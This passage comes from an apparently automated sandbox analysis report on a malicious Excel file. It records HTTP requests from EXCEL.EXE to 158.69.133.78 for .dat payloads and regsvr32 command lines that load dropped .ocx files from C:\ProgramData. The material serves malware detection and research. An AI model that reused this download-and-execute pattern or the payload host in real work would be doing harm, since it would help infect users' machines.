                                                                                                                                            Dec 2, 2021 21:00:19.461904049 CET4980780192.168.2.3185.82.126.78
                                                                                                                                            Dec 2, 2021 21:00:31.473555088 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:00:31.475163937 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:00:31.581520081 CET8049808158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 21:00:31.581665993 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:00:31.582458973 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:00:31.582535028 CET8049749158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 21:00:31.582616091 CET4974980192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:00:31.688711882 CET8049808158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 21:00:32.071048975 CET8049808158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 21:00:32.071141005 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:01:37.072993994 CET8049808158.69.133.78192.168.2.3
                                                                                                                                            Dec 2, 2021 21:01:37.073088884 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:02:41.361669064 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:02:41.704411983 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:02:42.313878059 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:02:43.517081022 CET4980880192.168.2.3158.69.133.78
                                                                                                                                            Dec 2, 2021 21:02:45.923540115 CET4980880192.168.2.3158.69.133.78

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • 158.69.133.78

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.349749158.69.133.7880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Dec 2, 2021 20:59:27.512147903 CET1372OUTGET /823634401007.dat HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                            Host: 158.69.133.78
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 2, 2021 20:59:28.168723106 CET1373INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Dec 2021 19:59:28 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 548
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            1192.168.2.349808158.69.133.7880C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Dec 2, 2021 21:00:31.582458973 CET6428OUTGET /823634401007.dat2 HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                            Host: 158.69.133.78
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Dec 2, 2021 21:00:32.071048975 CET6429INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Dec 2021 20:00:32 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 548
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            Analysis Process: EXCEL.EXE PID: 5140 Parent PID: 744

                                                                                                                                            General

                                                                                                                                            Start time:20:58:59
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                            Imagebase:0x810000
                                                                                                                                            File size:27110184 bytes
                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 2484 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:32
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 C:\ProgramData\Volet1.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 4028 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:33
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 C:\ProgramData\Volet2.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 4248 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:33
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 C:\ProgramData\Volet3.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 3324 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:34
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 5320 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:34
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Analysis Process: regsvr32.exe PID: 6200 Parent PID: 5140

                                                                                                                                            General

                                                                                                                                            Start time:21:00:35
                                                                                                                                            Start date:02/12/2021
                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
                                                                                                                                            Imagebase:0xe80000
                                                                                                                                            File size:20992 bytes
                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Reputation:high

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >